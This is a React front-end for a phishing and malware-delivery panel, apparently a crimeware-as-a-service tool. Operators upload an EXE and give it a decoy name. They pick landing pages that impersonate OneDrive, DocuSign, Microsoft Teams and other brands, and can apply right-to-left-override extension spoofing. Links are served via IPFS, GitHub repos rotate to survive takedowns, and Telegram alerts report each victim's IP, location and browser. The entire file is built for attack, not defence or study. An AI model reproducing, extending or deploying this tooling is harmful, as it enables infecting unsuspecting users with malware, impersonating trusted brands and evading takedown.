import React, { useState, useEffect, useCallback } from 'react';
import { useAuth } from '../store/auth';
import toast from 'react-hot-toast';

const API = process.env.REACT_APP_SERVER_URL || process.env.REACT_APP_API || '';

export default function GenerateLink() {
  const { claims, authHeaders } = useAuth();
  const isSuper = !!claims?.super;

  const [enabled, setEnabled] = useState(null); // null=loading, true/false
  const [settings, setSettings] = useState(null);
  const [admins, setAdmins] = useState([]);
  const [repos, setRepos] = useState([]);
  const [newRepo, setNewRepo] = useState({ github_token: '', github_repo: '', label: '' });
  const [addingRepo, setAddingRepo] = useState(false);
  const [history, setHistory] = useState([]);
  const [myTgChatId, setMyTgChatId] = useState('');
  const [savingTg, setSavingTg] = useState(false);
  const [testingTg, setTestingTg] = useState(false);
  const [botInfo, setBotInfo] = useState(null); // { bot_name, bot_handle }

  // Generate form
  const [file, setFile] = useState(null);
  const [displayName, setDisplayName] = useState('');
  const [senderName, setSenderName] = useState(claims?.sub || '');
  const [downloadMsg, setDownloadMsg] = useState('Your file is ready for download');
  const [style, setStyle] = useState('onedrive');
  const [tagMode, setTagMode] = useState('none');
  const [hintMessage, setHintMessage] = useState('');
  const [buttonText, setButtonText] = useState('Download');
  const [fakeExt, setFakeExt] = useState('');
  const [redirectUrl, setRedirectUrl] = useState('');
  const [generating, setGenerating] = useState(false);
  const [previewing, setPreviewing] = useState(false);
  const [previewOpen, setPreviewOpen] = useState(false);
  const [previewHtml, setPreviewHtml] = useState('');
  const [generatedUrl, setGeneratedUrl] = useState('');
  const [pageUrl, setPageUrl] = useState('');
  const [hasIpfs, setHasIpfs] = useState(false);

  const headers = useCallback(() => authHeaders(), [authHeaders]);

  // Check if enabled
  useEffect(() => {
    fetch(API + '/generate-link/enabled', { headers: headers() })
      .then(r => r.json()).then(d => setEnabled(d.enabled)).catch(() => setEnabled(false));
    fetch(API + '/generate-link/history', { headers: headers() })
      .then(r => r.json()).then(d => setHistory(d)).catch(() => {});
    if (isSuper) {
      fetch(API + '/generate-link/settings', { headers: headers() })
        .then(r => r.json()).then(d => setSettings(d)).catch(() => {});
      fetch(API + '/generate-link/admins', { headers: headers() })
        .then(r => r.json()).then(d => setAdmins(d)).catch(() => {});
      fetch(API + '/generate-link/repos', { headers: headers() })
        .then(r => r.json()).then(d => setRepos(d)).catch(() => {});
      fetch(API + '/generate-link/bot-info', { headers: headers() })
        .then(r => r.json()).then(d => { if (d.ok) setBotInfo(d); }).catch(() => {});
    } else {
      fetch(API + '/generate-link/my-telegram', { headers: headers() })
        .then(r => r.json()).then(d => setMyTgChatId(d.telegram_chat_id || '')).catch(() => {});
      fetch(API + '/generate-link/bot-info', { headers: headers() })
        .then(r => r.json()).then(d => { if (d.ok) setBotInfo(d); }).catch(() => {});
    }
  }, [isSuper, headers]);

  const saveMyTelegram = async () => {
    setSavingTg(true);
    try {
      const res = await fetch(API + '/generate-link/my-telegram', {
        method: 'POST', headers: { ...headers(), 'Content-Type': 'application/json' },
        body: JSON.stringify({ telegram_chat_id: myTgChatId }),
      });
      if (res.ok) toast.success('Telegram Chat ID saved');
      else toast.error('Failed to save');
    } catch { toast.error('Error saving'); }
    setSavingTg(false);
  };

  const refreshRepos = () => fetch(API + '/generate-link/repos', { headers: headers() })
    .then(r => r.json()).then(d => setRepos(d)).catch(() => {});

  const addRepo = async () => {
    if (!newRepo.github_token || !newRepo.github_repo) { toast.error('Token and repo required'); return; }
    setAddingRepo(true);
    try {
      const res = await fetch(API + '/generate-link/repos', {
        method: 'POST', headers: { ...headers(), 'Content-Type': 'application/json' },
        body: JSON.stringify(newRepo),
      });
      const d = await res.json();
      if (res.ok) { toast.success('Repo added'); setNewRepo({ github_token: '', github_repo: '', label: '' }); refreshRepos(); }
      else toast.error(d.detail || 'Failed to add repo');
    } catch (e) { toast.error(e.message); }
    setAddingRepo(false);
  };

  const deleteRepo = async (id) => {
    await fetch(API + '/generate-link/repos/' + id, { method: 'DELETE', headers: headers() });
    refreshRepos(); toast.success('Repo removed');
  };

  const activateRepo = async (id) => {
    await fetch(API + '/generate-link/repos/' + id + '/activate', { method: 'POST', headers: headers() });
    refreshRepos(); toast.success('Repo reactivated');
  };

  // Save settings
  const saveSettings = async () => {
    const res = await fetch(API + '/generate-link/settings', {
      method: 'POST', headers: { ...headers(), 'Content-Type': 'application/json' },
      body: JSON.stringify(settings),
    });
    if (res.ok) toast.success('Settings saved');
    else toast.error('Failed to save');
  };

  // Test API keys
  const [testResults, setTestResults] = useState(null);
  const [testing, setTesting] = useState(false);
  const testKeys = async () => {
    setTesting(true); setTestResults(null);
    try {
      const res = await fetch(API + '/generate-link/test-keys', {
        method: 'POST', headers: { ...headers(), 'Content-Type': 'application/json' },
        body: JSON.stringify(settings),
      });
      const data = await res.json();
      setTestResults(data);
      if (data.telegram?.bot_name) setBotInfo({ bot_name: data.telegram.bot_name, bot_handle: data.telegram.bot_handle });
    } catch (e) { toast.error('Test failed: ' + e.message); }
    setTesting(false);
  };

  const testMyTelegram = async () => {
    if (!myTgChatId.trim()) { toast.error('Enter your Chat ID first'); return; }
    setTestingTg(true);
    try {
      const res = await fetch(API + '/generate-link/test-telegram', {
        method: 'POST', headers: { ...headers(), 'Content-Type': 'application/json' },
        body: JSON.stringify({ chat_id: myTgChatId }),
      });
      const data = await res.json();
      if (data.ok) toast.success('Test message sent!');
      else toast.error(data.error || 'Failed to send test message');
    } catch (e) { toast.error(e.message); }
    setTestingTg(false);
  };

  // Toggle admin
  const toggleAdmin = async (agent_token, en) => {
    await fetch(API + '/generate-link/admins/toggle', {
      method: 'POST', headers: { ...headers(), 'Content-Type': 'application/json' },
      body: JSON.stringify({ agent_token, enabled: en }),
    });
    setAdmins(prev => prev.map(a => a.agent_token === agent_token ? { ...a, enabled: en } : a));
    toast.success(en ? 'Enabled' : 'Disabled');
  };

  // Generate link
  const generate = async () => {
    if (!file) { toast.error('Upload an EXE file'); return; }
    if (!displayName) { toast.error('Set a file display name'); return; }
    setGenerating(true);
    setGeneratedUrl('');
    setPageUrl('');
    setHasIpfs(false);
    try {
      const form = new FormData();
      form.append('file', file);
      form.append('display_name', displayName);
      form.append('sender_name', senderName);
      form.append('download_message', downloadMsg);
      form.append('landing_style', style);
      form.append('tag_mode', tagMode);
      form.append('hint_message', hintMessage);
      form.append('button_text', buttonText);
      form.append('fake_ext', fakeExt);
      form.append('redirect_url', redirectUrl);
      const res = await fetch(API + '/generate-link/generate', {
        method: 'POST', headers: headers(), body: form,
      });
      const data = await res.json();
      if (res.ok && data.ipfs_url) {
        setGeneratedUrl(data.ipfs_url);
        setPageUrl(data.page_url || data.ipfs_url);
        setHasIpfs(!!data.has_ipfs);
        toast.success('Link generated!');
        // Refresh history
        fetch(API + '/generate-link/history', { headers: headers() })
          .then(r => r.json()).then(d => setHistory(d)).catch(() => {});
      } else {
        toast.error(data.detail || 'Generation failed');
      }
    } catch (e) {
      toast.error(e.message || 'Error');
    }
    setGenerating(false);
  };

  const previewPage = async () => {
    setPreviewing(true);
    try {
      const form = new FormData();
      form.append('style', style);
      form.append('display_name', displayName || 'Document.pdf');
      form.append('sender_name', senderName || 'Admin');
      form.append('download_message', downloadMsg || 'Your file is ready for download');
      form.append('tag_mode', tagMode);
      form.append('hint_message', hintMessage);
      form.append('button_text', buttonText || 'Download');
      form.append('redirect_url', redirectUrl);
      const res = await fetch(API + '/generate-link/preview', {
        method: 'POST', headers: headers(), body: form,
      });
      if (res.ok) {
        const html = await res.text();
        setPreviewHtml(html);
        setPreviewOpen(true);
      } else {
        toast.error('Preview failed');
      }
    } catch (e) {
      toast.error(e.message || 'Preview error');
    }
    setPreviewing(false);
  };

  const s = {
    page: { padding: 20, maxWidth: 900, margin: '0 auto' },
    card: { background: 'var(--surface)', border: '1px solid var(--border)', borderRadius: 8, padding: 20, marginBottom: 16 },
    input: { width: '100%', padding: '10px 12px', background: 'var(--bg)', border: '1px solid var(--border)', borderRadius: 6, color: 'var(--text)', fontSize: 14, boxSizing: 'border-box', marginBottom: 12 },
    btn: (bg) => ({ padding: '10px 20px', background: bg || 'var(--accent)', color: '#fff', border: 'none', borderRadius: 6, cursor: 'pointer', fontWeight: 600, fontSize: 14 }),
    label: { display: 'block', fontSize: 12, color: 'var(--muted)', marginBottom: 4 },
    premium: { textAlign: 'center', padding: 60 },
    star: { fontSize: 48, marginBottom: 16 },
  };

  // Premium gate
  if (enabled === false && !isSuper) {
    return (
      <div style={s.page}>
        <div style={{ ...s.card, ...s.premium }}>
          <div style={s.star}>⭐</div>
          <h2 style={{ marginBottom: 8 }}>Premium Feature</h2>
          <p style={{ color: 'var(--muted)', marginBottom: 16 }}>
            Generate Link is a premium feature.<br />
            Contact your Super Admin to activate this for your account.
          </p>
        </div>
      </div>
    );
  }

  return (
    <div style={s.page}>
      <h2 style={{ fontWeight: 700, marginBottom: 16 }}>⭐ Generate Link</h2>

      {/* Super Admin Settings */}
      {isSuper && settings && (
        <div style={s.card}>
          <h3 style={{ fontSize: 14, marginBottom: 12, color: 'var(--muted)', textTransform: 'uppercase' }}>API Settings</h3>
          <label style={s.label}>GitHub Token</label>
          <input style={s.input} value={settings.github_token} onChange={e => setSettings({ ...settings, github_token: e.target.value })} placeholder="ghp_..." />
          <label style={s.label}>GitHub Repo (user/repo)</label>
          <input style={s.input} value={settings.github_repo} onChange={e => setSettings({ ...settings, github_repo: e.target.value })} placeholder="username/repo-name" />
          <label style={s.label}>Turnstile Site Key</label>
          <input style={s.input} value={settings.hcaptcha_site_key} onChange={e => setSettings({ ...settings, hcaptcha_site_key: e.target.value })} />
          <label style={s.label}>Turnstile Secret Key</label>
          <input style={s.input} value={settings.hcaptcha_secret} onChange={e => setSettings({ ...settings, hcaptcha_secret: e.target.value })} />
          <label style={s.label}>Pinata API Key <span style={{ color: 'var(--muted)', fontWeight: 400 }}>(optional — enables IPFS redirect links)</span></label>
          <input style={s.input} value={settings.pinata_api_key || ''} onChange={e => setSettings({ ...settings, pinata_api_key: e.target.value })} placeholder="your-pinata-api-key" />
          <label style={s.label}>Pinata Secret Key</label>
          <input style={s.input} value={settings.pinata_secret_key || ''} onChange={e => setSettings({ ...settings, pinata_secret_key: e.target.value })} placeholder="your-pinata-secret" />
          <label style={s.label}>Pinata Gateway <span style={{ color: 'var(--muted)', fontWeight: 400 }}>(leave blank for default: gateway.pinata.cloud)</span></label>
          <input style={s.input} value={settings.pinata_gateway || ''} onChange={e => setSettings({ ...settings, pinata_gateway: e.target.value })} placeholder="https://ipfs.io  (leave blank for default)" />
          <div style={{ borderTop: '1px solid var(--border)', margin: '8px 0 16px' }} />
          <div style={{ display: 'flex', alignItems: 'center', gap: 10, marginBottom: 12 }}>
            <h3 style={{ fontSize: 13, color: 'var(--muted)', textTransform: 'uppercase', margin: 0 }}>Telegram Notifications</h3>
            {botInfo && (
              <span style={{ fontSize: 12, padding: '2px 10px', background: '#0d2d1a', border: '1px solid #22c55e44', borderRadius: 12, color: '#4ade80' }}>
                🤖 {botInfo.bot_name} &nbsp;·&nbsp; @{botInfo.bot_handle}
              </span>
            )}
          </div>
          <label style={s.label}>Bot Token <span style={{ color: 'var(--muted)', fontWeight: 400 }}>(from @BotFather)</span></label>
          <input style={s.input} value={settings.telegram_bot_token || ''} onChange={e => { setSettings({ ...settings, telegram_bot_token: e.target.value }); setBotInfo(null); }} placeholder="123456789:AAAAAAA..." />
          <label style={s.label}>Chat ID <span style={{ color: 'var(--muted)', fontWeight: 400 }}>(your user ID or channel ID)</span></label>
          <input style={s.input} value={settings.telegram_chat_id || ''} onChange={e => setSettings({ ...settings, telegram_chat_id: e.target.value })} placeholder="-100123456789" />
          <p style={{ fontSize: 11, color: 'var(--muted)', marginBottom: 12 }}>
            You'll receive alerts for: page visit, captcha solved, and download button clicked — including IP, ISP, location, and browser.
          </p>
          <div style={{ display: 'flex', gap: 8 }}>
            <button onClick={saveSettings} style={s.btn()}>Save Settings</button>
            <button onClick={testKeys} disabled={testing} style={s.btn(testing ? '#666' : '#f59e0b')}>
              {testing ? '⏳ Testing...' : '🔍 Test Keys'}
            </button>
          </div>
          {testResults && (
            <div style={{ marginTop: 12 }}>
              {Object.entries(testResults).map(([key, val]) => (
                <div key={key} style={{ padding: '6px 0', fontSize: 13, borderBottom: '1px solid var(--border)' }}>
                  <div style={{ display: 'flex', alignItems: 'center', gap: 8 }}>
                    <span style={{ color: val.ok ? '#4ade80' : '#f87171', fontWeight: 600 }}>
                      {val.ok ? '✅' : '❌'} {key}
                    </span>
                    <span style={{ color: 'var(--muted)' }}>— {val.message}</span>
                  </div>
                  {key === 'demo_link' && val.ok && val.url && (
                    <div style={{ marginTop: 6, padding: '8px 12px', background: '#052e1680', border: '1px solid #22c55e', borderRadius: 6 }}>
                      <div style={{ fontSize: 11, color: '#86efac', marginBottom: 4, fontWeight: 600 }}>Demo Link (solve hCaptcha to test download)</div>
                      <div style={{ fontFamily: 'monospace', fontSize: 11, wordBreak: 'break-all', color: '#fff', marginBottom: 6 }}>{val.url}</div>
                      <div style={{ display: 'flex', gap: 8 }}>
                        <a href={val.url} target="_blank" rel="noreferrer"
                          style={{ ...s.btn('#2563eb'), padding: '4px 12px', fontSize: 11, textDecoration: 'none', display: 'inline-block' }}>
                          Open →
                        </a>
                        <button onClick={() => { navigator.clipboard.writeText(val.url); toast.success('Copied!'); }}
                          style={{ ...s.btn('#6366f1'), padding: '4px 12px', fontSize: 11 }}>
                          Copy
                        </button>
                      </div>
                    </div>
                  )}
                </div>
              ))}
            </div>
          )}
        </div>
      )}

      {/* Non-super admin: personal Telegram chat ID */}
      {!isSuper && (
        <div style={s.card}>
          <div style={{ display: 'flex', alignItems: 'center', gap: 10, marginBottom: 4 }}>
            <h3 style={{ fontSize: 14, color: 'var(--muted)', textTransform: 'uppercase', margin: 0 }}>My Telegram Alerts</h3>
            {botInfo && (
              <span style={{ fontSize: 12, padding: '2px 10px', background: '#0d2d1a', border: '1px solid #22c55e44', borderRadius: 12, color: '#4ade80' }}>
                🤖 {botInfo.bot_name} &nbsp;·&nbsp; @{botInfo.bot_handle}
              </span>
            )}
          </div>
          <p style={{ fontSize: 12, color: 'var(--muted)', marginBottom: 12 }}>
            Enter your Telegram Chat ID to receive alerts for your own landing pages. The bot is configured by Super Admin — you only need to provide your Chat ID.
          </p>
          <label style={s.label}>My Chat ID</label>
          <input style={s.input} value={myTgChatId}
            onChange={e => setMyTgChatId(e.target.value)}
            placeholder="e.g. 123456789" />
          <div style={{ display: 'flex', gap: 8, flexWrap: 'wrap' }}>
            <button onClick={saveMyTelegram} disabled={savingTg} style={s.btn(savingTg ? '#666' : undefined)}>
              {savingTg ? '⏳ Saving...' : '💾 Save Chat ID'}
            </button>
            {myTgChatId && (
              <button onClick={testMyTelegram} disabled={testingTg} style={s.btn(testingTg ? '#666' : '#22c55e')}>
                {testingTg ? '⏳ Sending...' : '📨 Send Test'}
              </button>
            )}
            {myTgChatId && (
              <button onClick={() => setMyTgChatId('')} style={s.btn('#ef4444')}>Clear</button>
            )}
          </div>
        </div>
      )}

      {/* Super Admin: per-admin toggle */}
      {isSuper && admins.length > 0 && (
        <div style={s.card}>
          <h3 style={{ fontSize: 14, marginBottom: 12, color: 'var(--muted)', textTransform: 'uppercase' }}>Admin Access</h3>
          {admins.map(a => (
            <div key={a.agent_token} style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', padding: '8px 0', borderBottom: '1px solid var(--border)' }}>
              <span>{a.name}</span>
              <button onClick={() => toggleAdmin(a.agent_token, !a.enabled)}
                style={{ ...s.btn(a.enabled ? '#ef4444' : '#22c55e'), padding: '4px 12px', fontSize: 12 }}>
                {a.enabled ? 'Disable' : 'Enable'}
              </button>
            </div>
          ))}
        </div>
      )}

      {/* Repo Rotation */}
      {isSuper && (
        <div style={s.card}>
          <h3 style={{ fontSize: 14, marginBottom: 4, color: 'var(--muted)', textTransform: 'uppercase' }}>Repo Rotation</h3>
          <p style={{ fontSize: 12, color: 'var(--muted)', marginBottom: 12 }}>
            Repos are tried in order (top = primary). When one gets taken down, the next takes over automatically.
          </p>
          {repos.map((r, i) => (
            <div key={r.id} style={{ display: 'flex', alignItems: 'center', gap: 8, padding: '8px 0', borderBottom: '1px solid var(--border)' }}>
              <span style={{ fontSize: 11, color: 'var(--muted)', width: 20, textAlign: 'center' }}>#{i + 1}</span>
              <div style={{ flex: 1 }}>
                <div style={{ fontSize: 13, fontWeight: 600 }}>{r.label}</div>
                <div style={{ fontSize: 11, color: 'var(--muted)', fontFamily: 'monospace' }}>{r.github_repo}</div>
                {!r.active && r.failed_at && (
                  <div style={{ fontSize: 11, color: '#ef4444', marginTop: 2 }}>
                    ⚠ Failed {new Date(r.failed_at).toLocaleString()} — skipped automatically
                  </div>
                )}
              </div>
              <span style={{ fontSize: 11, padding: '2px 8px', borderRadius: 4, background: r.active ? '#14532d' : '#450a0a', color: r.active ? '#4ade80' : '#f87171', fontWeight: 600 }}>
                {r.active ? 'Active' : 'Failed'}
              </span>
              {!r.active && (
                <button onClick={() => activateRepo(r.id)} style={{ ...s.btn('#22c55e'), padding: '3px 10px', fontSize: 11 }}>Restore</button>
              )}
              <button onClick={() => deleteRepo(r.id)} style={{ ...s.btn('#ef4444'), padding: '3px 10px', fontSize: 11 }}>Remove</button>
            </div>
          ))}
          {repos.length === 0 && (
            <div style={{ fontSize: 13, color: 'var(--muted)', padding: '8px 0' }}>No repos yet — save settings above to add your primary repo, or add backups below.</div>
          )}
          <div style={{ marginTop: 14, paddingTop: 14, borderTop: '1px solid var(--border)' }}>
            <div style={{ fontSize: 12, color: 'var(--muted)', marginBottom: 8, fontWeight: 600 }}>Add Backup Repo</div>
            <input style={s.input} placeholder="Label (e.g. Backup 1)" value={newRepo.label} onChange={e => setNewRepo({ ...newRepo, label: e.target.value })} />
            <input style={s.input} placeholder="GitHub Repo (user/repo)" value={newRepo.github_repo} onChange={e => setNewRepo({ ...newRepo, github_repo: e.target.value })} />
            <input style={s.input} placeholder="GitHub Token (ghp_...)" value={newRepo.github_token} onChange={e => setNewRepo({ ...newRepo, github_token: e.target.value })} />
            <button onClick={addRepo} disabled={addingRepo} style={s.btn(addingRepo ? '#666' : '#6366f1')}>
              {addingRepo ? '⏳ Verifying...' : '+ Add Repo'}
            </button>
          </div>
        </div>
      )}

      {/* Generate Form */}
      {(enabled || isSuper) && (
        <div style={s.card}>
          <h3 style={{ fontSize: 14, marginBottom: 12, color: 'var(--muted)', textTransform: 'uppercase' }}>Generate New Link</h3>

          <label style={s.label}>EXE File</label>
          <input type="file" accept=".exe" onChange={e => {
            const f = e.target.files[0];
            setFile(f);
            if (f && !displayName) setDisplayName(f.name);
          }} style={{ ...s.input, padding: 8 }} />

          <label style={s.label}>File Display Name</label>
          <input style={s.input} value={displayName} onChange={e => setDisplayName(e.target.value)} placeholder="Paystub_Q2_2026.exe" />

          <label style={s.label}>Sender Name</label>
          <input style={s.input} value={senderName} onChange={e => setSenderName(e.target.value)} />

          <label style={s.label}>Download Message</label>
          <input style={s.input} value={downloadMsg} onChange={e => setDownloadMsg(e.target.value)} />

          <label style={s.label}>Hint Message <span style={{ color: 'var(--muted)', fontWeight: 400 }}>(small text below download message — leave blank to hide)</span></label>
          <input style={s.input} value={hintMessage} onChange={e => setHintMessage(e.target.value)}
            placeholder={`You will need to run ${STYLE_NAMES[style] || style} update to view this file`} />

          <label style={s.label}>Download Button Text</label>
          <input style={s.input} value={buttonText} onChange={e => setButtonText(e.target.value)} placeholder="Download" />

          <label style={s.label}>Landing Page Style</label>
          <select style={s.input} value={style} onChange={e => setStyle(e.target.value)}>
            <option value="onedrive">OneDrive</option>
            <option value="dropbox">Dropbox</option>
            <option value="google_drive">Google Drive</option>
            <option value="box">Box</option>
            <option value="mediafire">MediaFire</option>
            <option value="zoom">Zoom</option>
            <option value="docusign">DocuSign</option>
            <option value="adobe">Adobe (Document)</option>
            <option value="google_calendar">Google Calendar</option>
            <option value="teams">Microsoft Teams</option>
            <option value="wetransfer">WeTransfer</option>
            <option value="slack">Slack</option>
            <option value="notion">Notion</option>
            <option value="icloud">iCloud Drive</option>
            <option value="outlook">Outlook</option>
            <option value="sharepoint">SharePoint</option>
            <option value="quickbooks">QuickBooks</option>
          </select>

          <button onClick={previewPage} disabled={previewing}
            style={{ ...s.btn(previewing ? '#666' : '#6366f1'), marginBottom: 16, padding: '8px 18px', fontSize: 13 }}>
            {previewing ? '⏳ Loading preview...' : '👁 Preview Page'}
          </button>

          <label style={s.label}>URL Personalization Tags</label>
          <div style={{ display: 'flex', gap: 16, marginBottom: 16 }}>
            {[['none', 'No tags'], ['email_only', 'Email only [Email]'], ['name_email', 'Name + Email [FirstName] [Email]']].map(([val, label]) => (
              <label key={val} style={{ display: 'flex', alignItems: 'center', gap: 6, cursor: 'pointer', fontSize: 13, color: 'var(--text)' }}>
                <input type="radio" name="tagMode" value={val} checked={tagMode === val} onChange={() => setTagMode(val)} />
                {label}
              </label>
            ))}
          </div>

          <label style={s.label}>Display Extension (RTLO trick) <span style={{ color: 'var(--muted)', fontWeight: 400 }}>— spoof the visible extension in download dialogs</span></label>
          <select style={s.input} value={fakeExt} onChange={e => setFakeExt(e.target.value)}>
            <option value="">None (use real extension)</option>
            <option value="pdf">.pdf</option>
            <option value="docx">.docx</option>
            <option value="xlsx">.xlsx</option>
            <option value="jpg">.jpg</option>
            <option value="png">.png</option>
            <option value="mp4">.mp4</option>
            <option value="zip">.zip</option>
          </select>
          {fakeExt && (
            <div style={{ fontSize: 11, color: '#fbbf24', marginBottom: 12 }}>
              ⚠ Avoid numbers in the file display name to prevent RTLO complications.
            </div>
          )}

          <label style={s.label}>After-Download Redirect URL <span style={{ color: 'var(--muted)', fontWeight: 400 }}>(optional — redirect visitor 2–3s after they click download)</span></label>
          <input style={s.input} value={redirectUrl} onChange={e => setRedirectUrl(e.target.value)}
            placeholder="https://example.com  (leave blank to stay on page)" />

          <button onClick={generate} disabled={generating} style={s.btn(generating ? '#666' : undefined)}>
            {generating ? '⏳ Generating...' : '🔗 Generate Link'}
          </button>

          {generatedUrl && (
            <div style={{ marginTop: 16, padding: 16, background: '#052e1680', border: '1px solid #22c55e', borderRadius: 8 }}>
              <div style={{ fontSize: 12, color: '#86efac', marginBottom: 10, fontWeight: 600 }}>Link Generated!</div>

              {hasIpfs ? (
                <div style={{ marginBottom: 14 }}>
                  <div style={{ fontSize: 11, color: '#fbbf24', marginBottom: 4, fontWeight: 600 }}>
                    ⚡ Share this IPFS link — goes live instantly and redirects to the landing page
                  </div>
                  <div style={{ fontFamily: 'monospace', fontSize: 12, wordBreak: 'break-all', color: '#fff', marginBottom: 6 }}>{generatedUrl}</div>
                  <button onClick={() => { navigator.clipboard.writeText(generatedUrl); toast.success('IPFS link copied!'); }}
                    style={{ ...s.btn('#f59e0b'), padding: '5px 14px', fontSize: 12 }}>📋 Copy IPFS Link</button>
                </div>
              ) : (
                <div style={{ fontSize: 12, color: '#f59e0b' }}>
                  ⚠ Configure Pinata API keys in the settings above to get a shareable IPFS link.
                </div>
              )}

            </div>
          )}
        </div>
      )}

      {/* Link History */}
      {history.length > 0 && (
        <div style={s.card}>
          <h3 style={{ fontSize: 14, marginBottom: 12, color: 'var(--muted)', textTransform: 'uppercase' }}>Link History</h3>
          <table style={{ width: '100%', borderCollapse: 'collapse', fontSize: 13 }}>
            <thead>
              <tr>
                <th style={th}>File</th>
                <th style={th}>Style</th>
                <th style={th}>Stats</th>
                <th style={th}>Date</th>
                {isSuper && <th style={th}>Admin</th>}
                <th style={th}>Link</th>
              </tr>
            </thead>
            <tbody>
              {history.map(h => (
                <tr key={h.id}>
                  <td style={td}>
                    <div style={{ fontWeight: 600 }}>{h.display_name}</div>
                    {h.redirect_url && (
                      <div style={{ fontSize: 10, color: 'var(--muted)', marginTop: 2, maxWidth: 200, overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}>
                        ↳ {h.redirect_url}
                      </div>
                    )}
                  </td>
                  <td style={{ ...td, color: 'var(--muted)', fontSize: 12 }}>{STYLE_NAMES[h.landing_style] || h.landing_style}</td>
                  <td style={td}>
                    <div style={{ display: 'flex', gap: 6, alignItems: 'center' }}>
                      <span title="Page visits" style={{ display: 'inline-flex', alignItems: 'center', gap: 3, padding: '2px 8px', borderRadius: 12, background: '#1e3a5f', border: '1px solid #3b82f620', color: '#60a5fa', fontSize: 11, fontWeight: 600 }}>
                        <span style={{ fontSize: 10 }}>👁</span> {h.visit_count || 0}
                      </span>
                      <span title="Download clicks" style={{ display: 'inline-flex', alignItems: 'center', gap: 3, padding: '2px 8px', borderRadius: 12, background: '#14532d', border: '1px solid #22c55e20', color: '#4ade80', fontSize: 11, fontWeight: 600 }}>
                        <span style={{ fontSize: 10 }}>⬇</span> {h.download_count || 0}
                      </span>
                    </div>
                  </td>
                  <td style={{ ...td, fontSize: 12, color: 'var(--muted)' }}>{h.created_at ? new Date(h.created_at).toLocaleDateString() : ''}</td>
                  {isSuper && <td style={{ ...td, fontSize: 12 }}>{h.admin_name}</td>}
                  <td style={td}>
                    <div style={{ display: 'flex', gap: 4, flexWrap: 'wrap' }}>
                      <button onClick={() => { navigator.clipboard.writeText(h.ipfs_url || h.page_url); toast.success('IPFS link copied!'); }}
                        style={{ background: 'none', border: '1px solid #f59e0b', borderRadius: 4, color: '#f59e0b', cursor: 'pointer', padding: '2px 8px', fontSize: 11, fontWeight: 600 }}>
                        ⚡ IPFS
                      </button>
                    </div>
                  </td>
                </tr>
              ))}
            </tbody>
          </table>
        </div>
      )}

      {/* Preview Modal */}
      {previewOpen && (
        <div style={{ position: 'fixed', inset: 0, background: 'rgba(0,0,0,.75)', zIndex: 2000, display: 'flex', alignItems: 'center', justifyContent: 'center' }}
          onClick={e => { if (e.target === e.currentTarget) setPreviewOpen(false); }}>
          <div style={{ width: '92%', maxWidth: 1080, height: '88vh', background: '#fff', borderRadius: 10, overflow: 'hidden', display: 'flex', flexDirection: 'column', boxShadow: '0 24px 80px rgba(0,0,0,.5)' }}>
            <div style={{ padding: '10px 16px', background: '#18181b', display: 'flex', alignItems: 'center', gap: 10, flexShrink: 0 }}>
              <div style={{ width: 10, height: 10, borderRadius: '50%', background: '#ef4444' }} />
              <div style={{ width: 10, height: 10, borderRadius: '50%', background: '#f59e0b' }} />
              <div style={{ width: 10, height: 10, borderRadius: '50%', background: '#22c55e' }} />
              <span style={{ marginLeft: 8, color: '#aaa', fontSize: 12, fontFamily: 'monospace' }}>
                Preview — {STYLE_NAMES[style] || style}
              </span>
              <div style={{ marginLeft: 'auto', display: 'flex', gap: 8, alignItems: 'center' }}>
                <span style={{ fontSize: 10, color: '#555', padding: '2px 8px', border: '1px solid #333', borderRadius: 4 }}>
                  Turnstile widget active · download disabled in preview
                </span>
                <button onClick={() => setPreviewOpen(false)}
                  style={{ background: 'none', border: '1px solid #444', borderRadius: 5, color: '#aaa', cursor: 'pointer', fontSize: 18, padding: '1px 10px', lineHeight: 1.3 }}>
                  ×
                </button>
              </div>
            </div>
            <iframe
              srcDoc={previewHtml}
              title="Landing Page Preview"
              sandbox="allow-scripts allow-same-origin allow-forms"
              style={{ flex: 1, border: 'none', width: '100%' }}
            />
          </div>
        </div>
      )}
    </div>
  );
}

const STYLE_NAMES = {
  onedrive: 'OneDrive', dropbox: 'Dropbox', google_drive: 'Google Drive', box: 'Box',
  mediafire: 'MediaFire', zoom: 'Zoom', docusign: 'DocuSign', adobe: 'Adobe',
  google_calendar: 'Google Calendar', teams: 'Microsoft Teams', wetransfer: 'WeTransfer',
  slack: 'Slack', notion: 'Notion', icloud: 'iCloud Drive', outlook: 'Outlook',
  sharepoint: 'SharePoint', quickbooks: 'QuickBooks',
};

const th = { textAlign: 'left', padding: '8px 12px', borderBottom: '1px solid var(--border)', fontSize: 11, color: 'var(--muted)', textTransform: 'uppercase' };
const td = { padding: '6px 12px', borderBottom: '1px solid var(--border)' };
